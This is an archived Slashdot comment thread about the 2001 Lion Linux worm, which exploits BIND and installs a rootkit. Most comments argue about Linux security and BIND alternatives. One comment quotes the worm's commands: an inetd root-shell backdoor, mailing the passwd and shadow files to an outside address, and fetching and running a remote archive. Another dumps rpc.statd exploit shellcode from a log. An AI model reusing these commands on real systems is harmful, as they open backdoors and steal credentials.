Slashdot Mirror
New Linux Worm
mspeedie writes "Seems Linux has very much arrive judging by the number of nasty virus starting to pop up. Check out the latest at:
Lion Worm Virus on Linux
" This is not a virus, its a worm that exploits a vulnerable bind to install a rootkit. Regardless, you should have tripwire or something running anyway.
The worm installs a Linux root kit.
my watch?
You know what's funny? I never have to run my NT services with admin privledges.
Most of the NT problems out there "should be fixed by the admin" as well and slashdot still goes apeshit over them.
"Seems Linux has very much arrive [sic] judging by the number of nasty virus starting to pop up.." Suprisingly, no slashdot pieces on outlook macro viruses began with "Further testifying to the fact that superior user-friendliness has led to its enthusiastic widespread adoption, microsoft outlook was subject to.." Spin, Zealots, Spin! Linux: the next mac.
Every time that a new worm or virus for email is mentioned about a Windows (type) OS this site goes crazy about reporting it and making little jokes about the inherent insecurity built into those systems... well, for a change we finally get the same problem on a Linux system! But, what does slashdot do about it? They say that "Regardless, you should have tripwire or something running anyway. " You mean to tell me that Linux is inherently insecure in its BIND implementation and that we need yet another tool to protect it? Next time an Outlook virus comes out... I expect them to say "Regardless, you should have McAfee running anyways." This type of journalism where excuses are made for Linux and other operating systems are harassed is highly unprofessional. Down with bigotry!
And if you got rootkitted, how the hell are you going to know that? Unless you keep ps on a floppy?
Did anyone else notice that, a virus/worm in a MS product its "such a bad product" but when theres a virus/worm in Linux, its "Linux is arriving!" and "its the users fault anyways".
Could sombody de-worm my GNU
Thanks
For me, djbdns has never ever core dumped and updates it's secondaries with no problem. It has also never had a security hole, for what it's worth.
Try the support mailing list.
Unless you don't really care, in that case, niether do I.
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
That is not 100% correct. See http://cr.yp.to/distributors.html. The only restriction is on redistribution of djbdns. These restrictions are not to make himself rich (if anything, he will lose money on djbdns). The restrictions are so that djbdns stays useful, functional and compatible across all platforms.
Tripwire? If you were a real admin you would look at the source for BIND, declare it garbage, and run djbdns instead.
Run BIND on production servers? Not if my life depended on it. djbdns runs chroot()'d, non-root by default and even then the author still puts up a $500 reward for anyone who can find a security hole.
I'm so glad we modern admins have a choice. djbdns is a real, safe, fast, and well documented alternative to BIND and if I were your boss I'd fire you for not switching.
Friends don't let friends run BIND!
Doesn't mean you don't have to pay for it.
"Hot lesbian witches! It's fucking genius!"
BIND isn't as nearly widespread amongst Linux installations as Outhouse is among WinDOS users. BIND simply isn't one of those apps that "everyone has to have" in order to "be compatible".
Besides, unless this worm is taking advantage of some Linux specific exploit: it could just as easily target any other Unix, or even Cygwin.
A Pirate and a Puritan look the same on a balance sheet.
Apache does run as it's own UID, if you set it up right. It has for some years now and quite likely has done so since it was created.
A Pirate and a Puritan look the same on a balance sheet.
These days, it does NOT require a PhD in computer science to ensure that your Linux box does not become a cracker's paradise.
Simple heuristics like:
"if you don't know what it is, turn it off"
and
"deny by default security policies"
go quite a long way when it comes to avoiding these things. Embedded firewalls are cheap and shiny happy firewall configuration tools are robust and plentiful.
OTOH, CmdrTaco's "arrogant remarks" can just as easily be directed at distributors.
A Pirate and a Puritan look the same on a balance sheet.
Quite:
A real sysadmin would either have the service disabled or simply make it inaccessable to the common script kiddie. Quite a lot can be done with server security without incurring unacceptable service outtages.
A Pirate and a Puritan look the same on a balance sheet.
Except there is this 'arcane' little command in Bughat called "setup". It quite safely allows the end user to disable things they don't understand. It also provides balloon help to guide the novice along.
A Pirate and a Puritan look the same on a balance sheet.
As with any issue of quality, the ultimate burden is on the consumer. They must be willing to inform themselves and then make informed choices. This is no less true for Windows vs. Linux as it is for Redhat vs. Mandrake.
A Pirate and a Puritan look the same on a balance sheet.
Actually, who claimed it was?
Do you even know of anyone that's been infested? Have YOU been infested? Has your company been?
A Pirate and a Puritan look the same on a balance sheet.
So? How well does Jagged Alliance 2 run on your FreeBSD installation?
A Pirate and a Puritan look the same on a balance sheet.
No, this is a distributor problem. BIND is not a particularly core part of Linux (or Unix in general). It just happens to be an application that some people find useful.
Whether or not BIND is an exploit depends on a 3rd party developer. Whether or not it's even running depends on who PACKAGED your version of Linux.
OTOH, you have NO CHOICE when it comes to WinDOS distributions. If Microsoft f*cks up, you have no where else to look. If Bughat f*cks up, you can look to Caldera, Mandrake, Debian, Slackware and Suse.
A Pirate and a Puritan look the same on a balance sheet.
Well... You should be running Anti-Virus software.
:-)
That's why you fix your vulnerabilities as they are discovered.
We should try to fix our vulnerabilities before they are discovered.
Er...
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
The actual virus in this case is bind, and it has to be erradicted....
Well... ok, DJBDNS is _different_, diffenrent if you are familiar with the usual ./configure; make; make install installments. But... ever installed bind from the sources? Oh well.
It's simultaneously a Linux problem and a bind
problem. It uses binaries compiled for Linux/i386
that attack vulnerable versions of the bind nameserver.
Mason, Buildkernel and more: http://www.stearns.org/
Maybe it's just coincidence, but last night, I had a very weird syslog event while I was pulling down email off my (Northpoint :-) ) DSL line. Copied below is a (very badly formatted) octal dump of the relevant section of the log:
________ : :
0000000 M a r 2 3 0 1 : 5 3 : 2 7
0000020 w a l k i e s - - M A R K
0000040 - - \n M a r 2 3 0 1 : 5 4
0000060 0 4 w a l k i e s i d e n t
0000100 d [ 1 2 2 8 6 ] : s t a r t e
0000120 d \n M a r 2 3 0 1 : 5 4 : 0
0000140 7 w a l k i e s \n M a r 2
0000160 3 0 1 : 5 4 : 0 7 w a l k i
0000200 e s s y s l o g d : C a n n
0000220 o t g l u e m e s s a g e
0000240 p a r t s t o g e t h e r \n M
0000260 a r 2 3 0 1 : 5 4 : 0 7 w
0000300 a l k i e s 1 7 3 > M a r 2
0000320 3 0 1 : 5 4 : 0 7 / s b i n
0000340 / r p c . s t a t d [ 1 6 4 ]
0000360 g e t h o s t b y n a m e e
0000400 r r o r f o r ^ X 367 377 277 ^ X
0000420 367 377 277 ^ Y 367 377 277 ^ Y 367 377 277 ^ Z 367
0000440 377 277 ^ Z 367 377 277 ^ [ 367 377 277 ^ [ 367 377
0000460 277 % 8 x % 8 x % 8 x % 8 x % 8 x
0000500 % 8 x % 8 x % 8 x % 8 x % 2 3 6
0000520 x % n % 1 3 7 x % n % 1 0 x % n
0000540 % 1 9 2 x % n 220 220 220 220 220 220 220 220 220
0000560 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220 220
*
0002160 220 220 220 1 300 353 | Y 211 A ^ P 211 A ^ H
0002200 376 300 211 A ^ D 211 303 376 300 211 ^ A 260 f 315
0002220 200 263 ^ B 211 Y ^ L 306 A ^ N 231 306 A ^
0002240 H ^ P 211 I ^ D 200 A ^ D ^ L 210 ^ A
0002260 260 f 315 200 263 ^ D 260 f 315 200 263 ^ E 0 300
0002300 210 A ^ D 260 f 315 \n M a r 2 3 0
0002320 1 : 5 4 : 0 7 w a l k i e s
0002340 307 ^ F / b i n 307 F ^ D / s h A 0
0002360 300 210 F ^ G 211 v ^ L 215 V ^ P 215 N ^
0002400 L 211 363 260 ^ K 315 200 260 ^ A 315 200 350 177 377
0002420 377 377 \n
0002423
________
Did someone try to h4x0r my laptop?
Schwab
Editor, A1-AAA AmeriCaptions
Actually the particular rootikit in question doesn't replace pstools. I found a trojaned stock RH 6.2 machine at work, and the worm was trying to replicate itself. It was running "hack.sh" and "scan.sh". A little after that I found the rootkit in /dev/.lib
Right. And I suppose you're going to sit there and claim that you're never hypocritical or apply double standards. If you do, you just proved my point.
-"Zow"
It depends on whether it's modifying a word that immediately follows it, as in "That is an anal-retentive poster," or if it is used alone, as in "The poster is anal retentive."
:-)
--Joe(PS. As long as the CoS folks are around, I figure anything that's OT might as well be OT3...)
--
Program Intellivision!
Of the lastest releases of software that you have on your system or pay someone to do it for you. Not to say the fact someone does this it is right to use such a worm but since we are in a world whee these thing exsists you have to be wary.
This statement is really indicative of another thing: cluelessness. Running tripwire will tell someone that they have been cracked! Close the barn door Edith, the cows just escaped!
Maybe the "or something" alludes to the real solution; don't run BIND, run an up-to-date patched version of BIND, run snort, etc... Maybe he should have said, "Patch early, patch often." But nooooo! Run tripwire.
BTW, this worm is really no different than the ramen worm; similar concept, different exploit. What has gotten the attention of sysadmins is that they are seeing a sudden surge in traffic to port 53. These sysadmins are the target audience of SANS, and the sysadmins don't like someone messing with their DNS. I believe that is why the Global Incident Analysis Center (GIAC) of SANS changed their current threat level to yellow. This comment was posted on GIAC (note TCP, not UDP to port 53).
BTW, the n.g. comp.os.linux.security had a posting about this (didn't know it was lion) back on Tuesday. In that thread, the guy that got cracked found this (using strings on the rogue program)
echo '1008 stream tcp nowait root /bin/sh sh' >> /etc/inetd.conf
/etc/passwd >> 1i0n
/etc/shadow >> 1i0n
/.bash_history
killall -HUP inetd;ifconfig -a > 1i0n
cat
cat
mail 1i0nip@china.com < 1i0n rm -fr 1i0n
rm -fr
lynx -dump http://XXXXXXXX.XX.net/crew.tgz >1i0n.tgz
tar -zxvf 1i0n.tgz
rm -fr 1i0n.tgz;cd lib
./1i0n.sh
I can tell YOU'VE never had a real job as a Sysadmin in a real shop.
--
Your Servant, B. Baggins
I can't believe ALL of you are speaking english as a second language ... the word is
BRAKES
--
I've finally had it: until slashdot gets article moderation, I am not coming back.
> Outlook automatically executes the virus for you using a built-in scripter that has full access to your system. How is Linux crappier than that?
The fact that the user has to click on a lengthy warning dialog to execute ILOVEYOU, which amounts to nothing more than a shell script (a WSH script, specifically).
Lion can be installed remotely without your ever knowing it, using a tool that ships with almost every Linux distro. But that's the admin's fault -- for running Linux.
--
I've finally had it: until slashdot gets article moderation, I am not coming back.
Linux vs. NT aside, if you were/are following anything even vaguely resembling reasonable security policy, you would already be protected. For example, if you're running RedHat 6.2, and signed up for their security mailing list, you should have upgraded to a new version that fixes this hole two months ago.
All of the NT exploits that have been getting the attention lately are old holes that were not patched by SysAdmins. The combination of keeping current patches and an IDS is like an alarm and a "Club" on your car: It won't stop an attack, but it makes other targets look easier.
-- Spring: Forces, coiled again!
The traffic you saw was likely the scanner portion looking for new victims. It randomly scans "class B" address blocks looking for new targets.
Paul
http://www.pauldrobertson.com
It would appear from a quick analysis that only the initial infection vector gets the rootkit. I've only gotten a bit of the way through the initial code, but it looks like the secondary infections all happen without the rootkit. I haven't run it yet to see for sure, but my current conjecture is that the huge blob of code is only used on the initial vector and the smaller bit is what gets replicated to each victim.
Paul
http://www.pauldrobertson.com
Sorry, it would appear that it's not a trojan, quick analysis seems to indicate that the trojaned piece isn't replicated with each subsequent infection. It's a worm, with the wormy piece coming from an HTTP server in China during the BIND exploit phase (via lynx.)
FWIW: There are more and more real viruses happening in the Windows world now that Win32's better understood by the bad guys.
Paul
http://www.pauldrobertson.com
If you don't *HAVE* to run ftpd, *don't* run it. Most especially don't run wu-ftpd. FTP is a bad protocol and every implementation I can think of has had problems, some more than others. Use a reasonably up to date HTTP server, and access control it if you allow HTTP upload. Throw on SSL and client-side certificates if you want something stronger. If you *have* to run FTP, you need to be updating it every time there's a new release (just like BIND.) A lot of us gave up on sendmail a long time ago and went to more secure mailers, http://www.postfix.org or http://www.qmail.org will make your box really zing mail out and both were written to be secure from the start. Sendmail's been pretty stable for a while now though, so it's not the concern it used to be.
As far as alerts go for public-facing services, generally you're better off following when the vendor/project team has released an update rather than trying to follow the mishmash of alerts, posts and filter the useful info out.
Paul
http://www.pauldrobertson.com
Actually, mainframes didn't get those sorts of attributes until the 70's AIR, DOS on the 360 certainly didn't have per-job file attributes, since it was a batch system.
If you want compartmentalization, ACLs, a privacy model, malcode capabilities, etc., then go to http://www.rsbac.org, patch your kernel and stop bitching.
Default configuration: Make your own distribution or script to turn everything on the way you like it. Neither is very difficult, and fixing is more productive than bitching.
Back to the task at hand- RSBAC could have stopped this worm, it's about time it went into a development kernel.
Paul
http://www.pauldrobertson.com
You're wrong. Viruses don't necessarily have to have malicious payloads to be viral, they simply have to infect files and spread themselves that way. Worms infect machines and spread themselves that way- once again no malicious payload required. After giving itself root access, it searches for *other machines* to exploit, and keeps doing that ad infinitum. That's what makes it a worm.
r m. html
r us .html
http://www.tuxedo.org/~esr/jargon/html/entry/wo
http://www.tuxedo.org/~esr/jargon/html/entry/vi
As far as malicious code, it's actually pretty boring, there are at least two examples of the exploit the worm uses to propogate, but it's definitely a worm and it appears to be in the wild.
Paul
http://www.pauldrobertson.com
Sorry, I read "that's" as "it's"- too much time disassembling :(
It is useful to note that we're getting more executable Win32 viruses now though (as opposed to scripts and macros- which are still pervasive but were pretty much all that was coming out for a while.) Our malcode guys have been predicting that for a while though. What worries me is the ELF file infector stuff. Thank goodness we haven't reached critical mass for Linux binaries yet, as there's still time to build in protection.
Paul
http://www.pauldrobertson.com
There isn't a definitive list, but there are around two dozen. The real problem with a list is that most AV companies are concerned about wild viruses, and worms, and so far that list is 2 long, ramen and 1i0n. I don't think the number of Outlook targeted things that are ITW, and most of those seem to be worms. This worm proves that bash is just as good as WSH for worms. If you look at the shell script stuff in 1i0n, you'll see that it's not all that impressive and pretty simple. Viral code seems to be a little trickier, but not majorly so compared to say Win32 viral code targeted at NT. What is difficult is getting traction with one, worms that exploit buffer overruns in common services seem to be the only things with a chance of gaining enough traction to beome a problem. Sooner or later that'll change, but for now it's enough to know that basic sysadmin skills should keep you safe.
Paul
http://www.pauldrobertson.com
The default Unix permissions model was designed for a specific purpose. It's worth pointing out that only a subset of IBM Mainframe OS' had the capabilities you describe- for instance, VM never had it. I've had RACF special and Class A-Z in VM, and I've run mainframes on everything from DOS (not the PC kind) up. Unix, originally designed for minicomputers, has grown to usage models well beyond it's original purpose, which is why some Unixes have added ACLs (some a number of years ago) and compartments and other security features (Trusted Solaris, CMW, etc.)
Not everyone needs those (unlike brakes on a car), and just like a manual transmission, not everyone can operate one, so for Linux it's optional.
Sorry if you're used to fast food, some of us enjoy ordering quality food item-by-item to get the best meal, not just the same old Happy Meal.
If you want it enough, you'll install it, if you don't, then you don't have to. If you want to wait for someone to create a turnkey distribution you can do that too. Just don't whine like a little baby that someone else isn't doing everything for you.
Actually, the quality bar has been set to "if it doesn't do it out of the box, generally someone's put a hell of a lot of work into doing it and is willing to share it and support it if you take one step in their direction." That's a hell of a lot better than "If it doesn't do it out of the box, wait until the vendor decides to release a bug-ridden version of it and if they don't want to, then you don't get that."
Hold your breath waiting for MAC-based compartments in WindowsANYTHING, or anything else that looks sufficiently B-level to provide strong security.
You might like bloated "it's all in there no matter if it's necessary or not" software systems, but they're not condusive to security and it's best when security-minded people build security critical pieces of them instead of OS-minded people, so patching for RSBAC works very well for those of us who care about security that deeply. It also makes the code easier to check when it's diffs instead of intermingled with the base kernel code.
If you buy a 2 seater sports car, don't expect it to be good at off-roading. The power of Linux is in the fact that I can get anything from RSBAC security to high-powered general purpose clusters and run the same code on them all.
If you need a silly little box around the software to make you happy, then you shouldn't be looking at Linux, it's not about inside the box.
Back on topic: RSBAC actually solves the "I don't want the administrator to be able to trojan this machine" problem as well as is possible on general purpose hardware (you can go download the international patches if you want to add another layer- or I suppose you could pay someone to do it since you seem to be allergic to actually installing software- must be hell when those new Reader Rabbit things come out!) The only other systems that come close cost tens of thousands of dollars and/or are obsolete.
Must have really pained you to choose which options you wanted on your car, or are you just walking until somone figures out how to have leather and cloth seats at the same time?
Paul
http://www.pauldrobertson.com
It is a worm. This is *exactly* that, it the larger of the two 1i0n packages gets executed on a machine, plants a bunch of trojans and goes searching for new machines which have port 53 open. If it finds them open, it exploits them to download the smaller 1i0n code which then leaves one backdoor (no trojans) and goes looking for machines that listen on port 53...
It does *not* appear to rootkit downstream infected machines, but it *does* move itself to other computers, which is what makes it a worm. Auto-exploit code is only a component of a worm if it automatically transfers itself to new machines. This code does that, therefore its a worm.
Replication if it infected "normal" programs would make it a virus, replication like this makes it a worm. Take away the self-replication and it's an exploit. All of these terms are well-defined, well-known and well-understood in the security and malcode communities.
In this case, the *worm* is the entire kit, and the exploit is a GLIBC 2.0 based executable called "bind" that's utilized by the worm to propogate via the TSIG overflow in BIND 8.2.x where x<3-REL.
"That system is left alone" is patently false in this case, since the downstream machine loads the smaller worm code and starts infecting machines of its own.
I dunno what you think a worm is, but the rest of
the community is sure that this is a worm. It's a boring worm, but it's definitely a worm.
Paul
http://www.pauldrobertson.com
Regardless, you should have tripwire or something running anyway.
What you should do is uninstall services you don't need. And if you absolutely need a named server, run something that doesn't have a history of being cracked.
Je ne parle pas francais.
Well, djbdns isn't really Free. I can't patch it, add some security holes, and redistribute it as the original, like I can with BIND.
Nope, I think most reasonable people who reads this site will agree that it better to be rooted than to run a free secure alternative.
Remember, the 'all bugs are shallow with enough eyeballs' only apply if the bugs are under GPL.
Je ne parle pas francais.
UNIX philosophy: Small utilities that only do one thing really well, then chain them together to form a bigger whole.
Je ne parle pas francais.
Bind is probably just as prevalent, being that if each network has one computer running BIND, and the other computers trust that computer to any extent, they're basically exposed as well. Don't forget that most "server" installs install BIND (so far as i've seen - your milage may vary).
And outlook isn't one of those programs that people "have to have" to be compatible. Not at home, if your'e just checking POP mail. And only at work if your employers settled on Exchange as their mail server... And who cares there anyways? It's not your computer, you're working under orders, you've gotta use the software they give you... But outlook so far as i've noticed, communicates really well with the outside world - Mac & PC versions work fine, sending just about any attatchment to any other mail client. My company's use of outlook forces no one else to use it, my point being.
If you're still running BIND instead of, say, djbdns, well, what the hell is wrong with you? Death to the Buggy Internet Name Daemon.
Agreed, but it's a rather damning indictment of Linux if after so many years and so many eyeballs, the 'standard' services still have security holes. Just MHO.
I don't care if it's 90,000 hectares. That lake was not my doing.
Funny, the MSN and AOL login icons on the default Windows desktop had me thinking that it was designed for networking. Or maybe it was just never really designed at all...
I don't care if it's 90,000 hectares. That lake was not my doing.
If people stopped giving root God-like powers then problems like this wouldn't crop up. Patches like LIDS help put root in a jail. Someday we can pray that root, and all the trust and power that goes along with UID 0, will go away completely.
Nearly everybody did see it coming. And it will come again. That's why you fix your vulnerabilities as they are discovered.
Caution: Now approaching the (technological) singularity.
I think we've pushed this "anyone can grow up to be president" thing too far.
At least he put caps in there;) Seriously, he needed it to be as confusing and arousingly exciting as possible, since spell-checked, well-reasoned, insightful story comments are generally chucked at first glance. Taco's criteria seems to be, "If the submitter thought about it long enough to write this much, of this quality, it's not sensational enough to post."
--
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
I don't mean to split hairs, but the word "virii" makes my skin crawl, the same way "irregardless" or "it's" used possessively does...
I'll shut up now... :-)
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Ahh, that wonderful ego showing its head again. Yes, all sysadmins wish they could be as perfect as you.
Lose the attitudes, people. Mistakes are made, patches are overlooked. It happens. It will continue to happen. There's nothing that can be done about it. And your arrogance isn't doing the rest of the world any good.
Perhaps, instead of insulting and complaining, you should try actually helping. You know a sysadmin that's a little weak in some areas? Give 'em a hand. Help 'em out. Be proactive.
You wonder why so many non-techies view us as raving lunatics, or arrogant shits. This is why. All we ever seem to do is foam at the mouth about how everything not Linux is evil, and that Open Source is the One True Way. And then we strut around like pumped-up little martinets, so convinced of our own greatness, and the mistaken belief that we are infallible.
Anyone here who makes the claim that they have never made a mistake configuring a server has either never configured a server, or is lying through their teeth.
But then, I suppose that for us to admit that we have screwed up from time to time would then force us to admit that we're not nearly as perfect as we like to think, and that, just perhaps, those egos and attitudes we've stroked so hard aren't worth a damn.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
Understood. And my point isn't that you should go out and fix every system that exists. That's impossible. What I'm saying is that, instead of showering SlashDot, and the rest of the world, with more of this "I'm the King of the SysAdmins" ego crap, you should do what you can to help prevent these problems from propogating.
What will you do if one of your friends whom you've warned doesn't update his system? Are you going to insult him? Call him stupid? "Gee, I'm really sorry you got rooted. If you weren't so stupid, this wouldn't have happened." I'm sure he'll have tons of respect for you after that.
Sorry, that was getting a bit personal, which is not at all what I intend.
Anys, my point is that we, as a community, need to move away from the collective Holier-Than-Thou attitude that has become so deeply ingrained. The Linux movement is based strongly on the concept of a group of people helping each other to find the best solution to a problem. The solution slips out of our reach when we become a bunch of egomaniacal bastards.
If someone you know (that's any of you out there!) does get rooted by this exploit, don't thrash them for not updating their system. Instead, give them a hand. Help them recover from the damage. Offer suggestions on how to prevent these sorts of problems in the future. If they don't understand, teach them. You don't have to be Superman; if all you do is help one person, then that's one less computer that's at risk.
We're not at war with each other, gentlemen (and ladies!) We're at war with the little monkeyshits who take advantage of these exploits to do damage.
"The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
The version of bind that is being exploited is exploitable on all systems, not just Linux.
The problem lies in the very fact that linux is becomming more and more popular. A few years ago, it wasn't worth the effort to write a virus for linux because there just weren't that many linux systems out there, and they all varied enourmously in their file system structure.
Nowadays, there are lots of installations, and their structure is similiar enough that some malicious dude can write a bunch of scripts, and have a good chance of successfully cracking root, getting into the system and causing it to subsequently crack other systems.
That person could easily do the same thing for Solaris, or HPUX, or Irix, but that creates extra time. The exact nature of the exploit, as well as what is required to convinve the system to propogate the virus, changes with each OS. Given the much less number of these systems out there, it simply isnt worth the effort.
Linux is making itself a target simply by becomming popular, in the same way that Windows is currently the prime target.
Really, then try this. Install qmail/svscan on a system with sendmail installed. Then try to startup qmail using svscan without shutting down sendmail. Then watch your system load jump to 5+ and your system grind to a halt. And yes it is easy to get into this situation if for example you forget to shutdown sendmail during a transition to qmail or you accidently forget to remove sendmail from the list of daemons started up at boot.
"When you sit with a nice girl for two hours, it seems like two minutes. When you sit on a hot stove for two minutes, it
I just put it up and I'm sure it won't be up long since I posted the IP on /.
any way I will reload again soon
It's just for play so it don't matter if it gets screwed
but I have worried that someone might use it for evil porposes.
http://Lenny.com
You mean like this system?
http://64.252.15.27
http://Lenny.com
As far as the Microsoft shills who say that now they (the paid MSFT shills)
Well, heck, in that case, I claim that you are a paid Linux shill!
Come on -- do you SERIOUSLY think that Microsoft would bother stooging a site like this? Its credibility is much better served by the pro OSS and Linux advocates who rabidly jump against Microsoft every chance they get.
Occam's razor - skins em every time.
Simon
Coming soon - pyrogyra
So, yes, I seriously do think that MSFT "stooges" Slashdot. MSFT has such a track record that I believe any pro-MSFT opinion expressed in a public forum has to be viewed with a fair amount of suspicion.
I think that any pro-ANYTHING opinion expressed in a public forum has to be viewed with a fair amount of suspicion. Same with any negative-ANYTHING opinion.
Simon
Coming soon - pyrogyra
You wonder why so many non-techies view us as raving lunatics, or arrogant shits. This is why. All we ever seem to do is foam at the mouth about how everything not Linux is evil, and that Open Source is the One True Way. And then we strut around like pumped-up little martinets, so convinced of our own greatness, and the mistaken belief that we are infallible.
Actually as a techie, I view a lot of Slashdot's population in exactly the same way. It's a tool, people -- not a religion.
Tools chip, break, and fall apart. All tools do.
Simon
Coming soon - pyrogyra
When problems are more widely discussed and understood, they allow the common Internet vandal (script kiddie) the ability to point and click their way through denial of service attacks, web site defacement and the like.
They don't scare me the way the real criminals do: the ones that are serious and determined, and who are good enough to not get caught. I doubt these guys/gals share the tricks of the trade.
Now, let's shift focus to closed-source software. Most if not all closed-source software is, for obvious reasons, owned by companies interested in making a profit. Naturally, the larger the install base, the larger the company. Big companies move slowly at doing nearly everything. What business sense would there be in a big company announcing a problem before they had a solution?
I'd wager that nearly every time a closed-source software package has released a security-related patch, any number of people have been quietly exploiting these scary problems.
I'd prefer to have no security holes, but if I had to choose I'd rather face a script kiddie than an experienced, determined cracker....
No OS is impervious to worms, virii, trojans, etc. ... Quit using it as a reason to "make the switch to linux" in your anti-microsoft banter; you're not fooling anyone.
Yeah, but that's the equivalent of saying no nation is free of diseases. There are some places in the world you'd rather be (America, Europe, Japan, etc.) than others (Somalia, Haiti, Ghana). Better hospitals and better sanitation would be good reasons to prefer the more powerful industrialized nations. If anyone's been claiming that Linux (and UNIX in general) is invulnerable, then they really need to ask themselves why there even is an effort to make systems like OpenBSD. However, saying that one outbreak of a worm makes Linux on the same level as Windows in terms of security is like claiming that the LA riots made America equivalent to Palestine in terms of social stability.
Yes, there are Linux worms. Yes, there are Linux root-kits, designed to exploit well-known bugs in programs distributed with certain Linux distributions. Does that mean that Linux is anywhere near as vulnerable as Windows? I don't think so. Security is still a reason to switch from Windows to Linux, and a knowledgeable person who actually cares about security can put together a nearly bulletproof box with a little effort.
Could you say the same for Windows? Maybe, but it's a lot harder and takes away a lot more functionality to do so because there are fewer alternative solutions to replace the builtin solutions. (No IIS, no "Windows Networking", no Outlook, no IE, etc.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
What is really needed in Linux is the ability for various distributions to automatically install security updates. I realize that many admins have written scripts to do this, but this should be a default option. For dialup users, it should check for updates every time the user connects to the Internet, and for 24/7 connections it should check for updates once a day.
This post is encrypted twice with ROT-13. Documenting or attempting to crack this encryption is illegal.
Which is totally useless if the rootkit hides itself my loading a kernel module.
For the goatse.cx wary, go to www.securityfocus.com and search for "Analysis of the KNARK rootkit".
Hands in my pocket
> GNU/Linux Worm? Is there a dash between anal and retentive?
-- queef
Oh, wait. I'm one of those Linux-using bastards.
No boom today. Boom tomorrow. There's always a boom tomorrow. - Cmdr. Susan Ivanova
So for us non-specialists, its not an option to say "Turn everyything off" - and while I'm competent, I'm not an expert, and I don't have the time (or the energy!) to check bugtraq once a day. Sigh - what we need is a sysadmin who'll take care of our linux machines along with the "supported" Solaris boxen...
Anyway - at least I'm not running sendmail! (Always look on the brii--iight side...")
"I will take the Ring," he said, "though I do not know the way."
A couple of friends and I got hit by this exploit a couple of weeks ago. How did I find out? The sendmail failed to send out my passwd file (it kills off bind :) )! Imagine my surprise when it popped up in my inbox four days later. A quick halt, trot down to the shop to get RH7, burn a CD with all the updates, and re-install later, I'm up and back.
I think my machine was being used in a DOS attack at the time too, since it was sending out a lot of traffic. Maybe it was being used to target the other systems on the subnet. Who knows. I didn't do much in the way of investigation. I was remote at the time, and I pay for traffic. :)
Now, I've got a slightly more secure firewall, and I've turned off a bunch of services, and I've got tripwire running. I'm still seeing TCP connections on port 53 though, so lots of people are getting infected/running the exploit.
Jason PollockIt goes "Dans le jungle, terrible jungle, le lion est mort ce soir".
That is "... the lion is dead tonight"
Makes more sense really, celebrating that it's died, rather than that it's sleeping. Otherwise the singing would probably wake it up ...
perl -e 'fork||print for split//,"hahahaha"'
I know their reputation, but I have never looked at the source and so I don't know why (or whether) they deserve that reputation. Anyone care to elucidate? (If possible, with a better explanation than "they're written in C". So's Apache, and it's not known for being riddled with holes (I'm sure there's been some, but its reputation isn't like BIND's or Sendmail's)).
perl -e 'fork||print for split//,"hahahaha"'
If I'm not mistaken, this worm exploits the same BIND vulnerability discussed here. So if you've upgraded BIND, you ought to be okay.
Right?
Tripwire has split into a commerical version and an open source version.
--
Anyone want to chat with the author, Lion? I tracked him down to a Chinese IRC server. It was quite interesting to talk to him. If the worm hit your machine, he's got your passwd file.
Is what Apache normally runs under. You've basically described how it works.
Cheers,
Rick Kirkland
But how would Tripwire help against the Lion worm? Wouldn't it just rub your nose in the fact you'd just got 0wnd? JJ
"And the meaning of words; when they cease to function; when will it start worrying you?"
Strictly speaking you are absolutly correct and I stand corrected.
However, my argument still stands because most users don't consider their kernel to be their OS, and they consider their Operating System to be Linux and not GNU (which it really is as debian HURD developers will quickly point out to you). So the difference is largely a misnomer...
My point here would be that desktop users may want choices, but more importantly, they want intelligent default choices to be made for them by their distributions so they don't ever have to worry about it. This includes not defaulting to buggy software or worm vulnerable builds of BIND. A good OS will instill confidence in the user by making good default choices on their behalf (which Windows/Mac do well) and allowing them to inspect and change them if they desire (which linux does well). Both of these are the responsabilty of the distro if linux is ever to move over to the desktop.
-pos
The truth is more important than the facts.
The truth is more important than the facts.
-Frank Lloyd Wright
First of all... This is a linux problem and not just a Bind problem becuase bind gets installed in a lot of distributions by default. It's the same people who talk about linux taking over the desktop who later say that it's the user's fault that they should know what their machine is doing.
If linux is just for hackers, then fine. BUT, if you have ever expressed that you want linux to be the default instead of Mac, Windows or whatever then you owe it to yourself to be realistic about why most people use computers. It's probably different than why you do, and it's probably because they just want software that does a job for them. They don't care how it works and they shouldn't have to. We don't make fun of people who don't know what happened when their car breaks. Sure... it's respectable to know why, but it's not a sin not to.
And second...
Regardless, you should have tripwire or something running anyway
That is a total cop-out! I'm sure every one here knows that a windows user would get absolutly jumped on if they said something like that about windows security. "Security hole in windows? you should be running antivirus software. It's your own fault."
flame on.
-pos
The truth is more important than the facts.
The truth is more important than the facts.
-Frank Lloyd Wright
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
y -default-installations" thought here...
These "people" are you and me, the admins. This problem is clearly the admin's fault.
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-b
There is very little truth in your statement these days. On most recent distros you have to choose explicitly to be a server. If you don't, you have to explicitly choose to install and enable BIND. Truth be known, I doubt there are very many KDE workstations out there running named.
No, the blame lies in lazy (or nonexistant?) sysadmins. Let's face it; why is your server running BIND if it doesn't need to (you chose it from the install...)? If the machine is a nameserver, then when the advisory came out in January, did you patch up right away? If not, WHY NOT?. The vendors got updated RPMs and whatnot out fairly quickly.
For the non-existant admin problem, things like the Redhat network will help tremendously.
Not trying to flame here, but your ranting sounds like the parents who blame high-school shootings on video games and movies, when they should be pointing in the mirror. To all the slack admins out there: Enough of this sh*t. Suck it up and do your damn jobs.
FWIW, installs are getting very savvy these days, taking up the slack for the poor job a lot of admins out there are doing; check out RH's latest beta (wolverine?) install - it does ipchains config during the install.
Don't sweat the petty things. But do pet the sweaty things.
Bah, positive comments mean more to me (as they should to anyone) than moderation. Thanks.
-bugg
So unless you're a Linux user, or an X86 BSD user who's so whacked out he's running a linux binary of bind, you aren't affected by this worm.
-bugg
Nope, that's a trojan. Here's a quick explaination of the different terms for malicious code:
